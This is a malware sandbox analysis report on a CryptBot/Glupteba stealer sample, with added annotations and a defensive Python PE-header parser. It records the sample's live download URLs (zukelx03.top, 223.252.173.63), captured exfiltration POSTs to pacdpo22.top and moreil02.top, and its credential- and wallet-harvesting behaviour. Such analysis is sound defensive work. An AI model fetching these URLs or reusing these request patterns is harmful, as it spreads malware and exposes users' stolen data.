Windows Analysis Report 7yyqdBJVGf.exe

Overview

General Information

Sample Name: 7yyqdBJVGf.exe
Analysis ID: 492301
MD5: 267667a4bbfdfcf20c407c2b191fd0ed
SHA1: 73870de4caa2eaaf162c81c34740527e12b8467c
SHA256: c3b9a8dde21bf3c1bb09426a261c77eb4b59cb2f36ac82e5b8f6b4a4d3565b5b
Tags: CryptBot, exe

Detection

Cryptbot, Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected Glupteba
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: WScript or CScript Dropper
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Obfuscated command line found
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

AV Detection:

Antivirus detection for URL or domain
Source: http://zukelx03.top/downfiles/lv.exe Avira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted file
Source: 7yyqdBJVGf.ex Virustotal: Detection: 52%
Source: 7yyqdBJVGf.exe ReversingLabs: Detection: 48%
Multi AV Scanner detection for domain / URL
Source: http://zukelx03.top/downfiles/lv.exe Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\File.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe ReversingLabs: Detection: 35%
Machine Learning detection for sample
Source: 7yyqdBJVGf.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.0.wheezy.exe.4e0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 13.2.wheezy.exe.4e0000.0.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle, 0_2_00401220
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E662D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 13_2_004E662D
Note: the signature name is broader than the evidence. The first function maps a file into memory and hands its contents to CryptUnprotectData, i.e. DPAPI decryption under the logged-on user's credentials; that is how stealers recover browser-stored secrets (for example the master key in a Chromium profile's Local State file), so this hit belongs with the browser-harvesting findings in this report. The second resolves DecryptFileA (the EFS API) at run time from a system DLL; wheezy.exe carries the wextract.pdb debug path (see Compliance) and extracts into an IXP000.TMP directory, both characteristic of the Microsoft wextract/IExpress self-extracting stub, so this is stub behaviour rather than attacker-written cryptography.

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
Uses 32bit PE files
Source: 7yyqdBJVGf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
Source: Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
Source: Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
Source: Binary string: acppage.pdb source: acppage.dll.10.dr
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose, 0_2_004026C0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042B3BE FindFirstFileExW, 0_2_0042B3BE
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406301 FindFirstFileW,FindClose, 10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 13_2_004E23D4

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 88.99.66.31 187
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com DNS query: name: ip-api.com
Source: C:\Windows\SysWOW64\wscript.exe DNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Yara detected Generic Downloader
Source: Yara match File source: 24.2.Bisogna.exe.com.39857c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Bisogna.exe.com.395ebb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Bisogna.exe.com.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Bisogna.exe.com.393bfa8.2.raw.unpack, type: UNPACKEDPE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Tue, 28 Sep 2021 13:24:11 GMT
    Server: Apache/2.2.22 (@RELEASE@)
    Last-Modified: Tue, 28 Sep 2021 09:56:00 GMT
    ETag: "380018-44fbf6-5cd0b38838d02"
    Accept-Ranges: bytes
    Content-Length: 4520950
    Connection: close
    Content-Type: application/octet-stream
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00
00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
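The raw body above is the beginning of the lv.exe download. The Python below, added here as an example and not part of the Joe Sandbox report, transcribes the first 0x2b8 bytes of that dump (DOS header through the section table; the zero padding that follows is dropped) and parses them the way a network sensor or triage script would, to confirm the "Downloads executable code via HTTP" verdict from the bytes themselves and to pull out what the report states only indirectly: a PE32 with six sections including NSIS's .ndata (matching the nsis.sf.net string found in File.exe), a populated security directory (the DigiCert certificate URLs found in the same file), and an entry point RVA of 0x38af at image base 0x400000, i.e. 0x4038af, which is the EntryPoint function 10_2_004038AF that System Summary lists for File.exe, consistent with File.exe being the saved copy of this download. Field offsets follow the PE/COFF specification; the triage wording is this example's own.

```python
"""Parse the PE headers at the start of the lv.exe download captured above.

Added example, not part of the Joe Sandbox report. LV_EXE_HEAD is transcribed
from the report's "Data Raw" dump (first 0x2b8 bytes: DOS header through the
section table); field offsets follow the PE/COFF specification.
"""
import struct

_h = bytes.fromhex  # spaces inside the hex literals only group fields

LV_EXE_HEAD = (
    # IMAGE_DOS_HEADER: "MZ" ... e_lfanew = 0xd0 at offset 0x3c
    _h("4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000")
    + bytes(28) + _h("d0000000")
    # DOS stub
    + _h("0e1fba0e 00b409cd 21b8014c cd21")
    + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7)
    # Rich header (tool-chain fingerprint, left undecoded here)
    + _h("417bd16b051abf38 051abf38051abf38 0c623c38061abf38 0c622c38141abf38"
         "051abe38a91abf38 1e871538091abf38 1e872538041abf38 1e872238041abf38"
         "52696368051abf38 0000000000000000")
    # "PE\0\0" + IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, ..., Characteristics
    + _h("50450000 4c01 0600 e4e2474f 00000000 00000000 e000 0201")
    # IMAGE_OPTIONAL_HEADER32 standard + Windows-specific fields (96 bytes)
    + _h("0b01 0a00 00740000 007a0700 00420000 af380000 00100000 00900000"
         "00004000 00100000 00020000 0500 0000 0600 0000 0500 0000 00000000"
         "00001700 00040000 00000000 0200 4085 00001000 00100000 00001000 00100000"
         "00000000 10000000")
    # 16 data directories: only import, resource, security and IAT are populated
    + bytes(8) + _h("40ac0000 b4000000") + _h("00001600 18ef0000") + bytes(8)
    + _h("00600800 94090000") + bytes(56) + _h("00900000 d0020000") + bytes(24)
    # 6 x IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
    # PointerToRawData, 12 unused bytes, Characteristics
    + _h("2e74657874000000 8c720000 00100000 00740000 00040000") + bytes(12) + _h("20000060")
    + _h("2e72646174610000 6e2b0000 00900000 002c0000 00780000") + bytes(12) + _h("40000040")
    + _h("2e64617461000000 9c2b0700 00c00000 00020000 00a40000") + bytes(12) + _h("400000c0")
    + _h("2e6e646174610000 00100e00 00f00700 00000000 00000000") + bytes(12) + _h("800000c0")
    + _h("2e72737263000000 18ef0000 00001600 00f00000 00a60000") + bytes(12) + _h("40000040")
    + _h("2e72656c6f630000 d60f0000 00f01600 00100000 00b80000") + bytes(12) + _h("40000042")
)


def parse_pe_headers(data: bytes) -> dict:
    """Walk DOS -> COFF -> optional header -> section table; raise on malformed input."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, maj, minr, _, _, _, entry, _ = struct.unpack_from("<HBBIIIII", data, opt)
    if magic == 0x10B:        # PE32
        image_base, = struct.unpack_from("<I", data, opt + 28)
        dirs = opt + 96
    elif magic == 0x20B:      # PE32+
        image_base, = struct.unpack_from("<Q", data, opt + 24)
        dirs = opt + 112
    else:
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    subsystem, = struct.unpack_from("<H", data, opt + 68)
    # Directory 4 (SECURITY) holds a file offset and size, not an RVA: the Authenticode blob
    security = struct.unpack_from("<II", data, dirs + 4 * 8)
    table = opt + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        flags, = struct.unpack_from("<I", data, table + 40 * i + 36)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "va": va, "rsize": rsize, "rptr": rptr, "flags": flags})
    return {"machine": machine, "number_of_sections": nsec, "timestamp": stamp,
            "characteristics": chars, "linker_version": (maj, minr), "entry_point": entry,
            "image_base": image_base, "subsystem": subsystem,
            "security_directory": security, "sections": sections}


def section_for_rva(hdr: dict, rva: int):
    """Section containing rva, or None (the check behind 'Entry point lies outside standard sections')."""
    for s in hdr["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rsize"]):
            return s["name"]
    return None


def triage_http_body(body: bytes) -> list:
    """Findings a sensor could attach to an application/octet-stream response body."""
    if body[:2] != b"MZ":
        return []
    try:
        hdr = parse_pe_headers(body)
    except (ValueError, struct.error):
        return ["MZ prefix but PE headers truncated or invalid"]
    out = [f"PE executable, machine {hdr['machine']:#x}, {hdr['number_of_sections']} sections"]
    if ".ndata" in [s["name"] for s in hdr["sections"]]:
        out.append("NSIS installer stub (.ndata section)")
    if hdr["security_directory"] != (0, 0):
        out.append("Authenticode signature present (security directory)")
    out.append(f"entry point {hdr['entry_point']:#x} in {section_for_rva(hdr, hdr['entry_point']) or 'no section'}")
    return out
```

Only the headers are needed for this triage, so a sensor can run it on the first few kilobytes of a response before the full 4.5 MB body has arrived; a body that starts with MZ but whose headers do not parse is itself worth an alert.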
Uses a known web browser user agent for HTTP communication
(Two different agents appear below. The Mozilla/4.0 (compatible; MSIE 7.0; ... Trident/7.0; ...) string is the default user agent of WinINet/urlmon and matches the URLDownloadToFileW call listed further down, so those GETs are plain API downloads. The Chrome/93 string on the multipart POSTs to pacdpo22.top and moreil02.top is set explicitly by the sample; with bodies of about 73 KB these POSTs are consistent with exfiltration of the harvested data.)
Source: global traffic HTTP traffic detected:
    GET /1N5Jh7 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: iplogger.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Host: pacdpo22.top
    Content-Length: 73148
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Host: moreil02.top
    Content-Length: 73136
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /download.php?file=lv.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: zukelx03.top
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /downfiles/lv.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: zukelx03.top
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /json HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ip-api.com
    Connection: Keep-Alive
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp String found in binary or memory: http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wheezy.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wheezy.exe.10.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonC:
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonH
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonQ
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/jsonq
Source: File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 7yyqdBJVGf.exe, 00000000.00000003.296660042.0000000002E58000.00000004.00000001.sdmp String found in binary or memory: http://pacdpo22.top/index.php
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000002.316458179.0000000005220000.00000004.00000001.sdmp String found in binary or memory: http://zukelx03.top/downfiles/lv.exe
Source: 7yyqdBJVGf.exe, 7yyqdBJVGf.exe, 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://zukelx03.top/download.php?file=lv.exe
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: https://evernote.com/
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, wscript.exe, 00000029.00000003.581967633.0000000005773000.00000004.00000040.sdmp String found in binary or memory: https://iplogger.org/1N5Jh7
Source: 7yyqdBJVGf.exe, 00000000.00000002.316164733.0000000002E60000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.comXf;
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: pacdpo22.top
